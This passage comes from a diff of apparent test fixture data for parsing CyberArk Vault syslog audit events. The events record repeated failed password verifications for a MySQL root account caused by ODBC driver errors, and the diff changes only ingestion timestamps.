State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:56:29\",\"IsoTimestamp\":\"2021-03-15T16:56:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827245\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -809,7 +754,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application", - "ingested": "2021-06-09T10:24:34.493919100Z", + "ingested": "2021-12-09T13:37:01.193631200Z", "original": "\u003c7\u003e1 2021-03-15T17:01:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:01:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:01:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827554\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mariadb\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:01:07\",\"IsoTimestamp\":\"2021-03-15T17:01:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827554\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"mariadb\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -919,7 +864,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-06-09T10:24:34.493922700Z", + "ingested": "2021-12-09T13:37:01.193636900Z", "original": "\u003c7\u003e1 2021-03-15T17:05:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:05:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:05:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827864\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:05:47\",\"IsoTimestamp\":\"2021-03-15T17:05:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827864\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1029,7 +974,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-06-09T10:24:34.493925300Z", + "ingested": "2021-12-09T13:37:01.193642600Z", "original": "\u003c7\u003e1 2021-03-15T17:10:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:10:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:10:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615828174\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:10:25\",\"IsoTimestamp\":\"2021-03-15T17:10:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615828174\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1140,7 +1085,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493927800Z", + "ingested": "2021-12-09T13:37:01.193648300Z", "original": "\u003c7\u003e1 2021-03-15T17:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:28:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:28:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829287\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 127.0.0.1. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:28:07\",\"IsoTimestamp\":\"2021-03-15T17:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829287\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1253,7 +1198,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493929900Z", + "ingested": "2021-12-09T13:37:01.193654Z", "original": "\u003c7\u003e1 2021-03-15T17:33:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:33:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:33:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
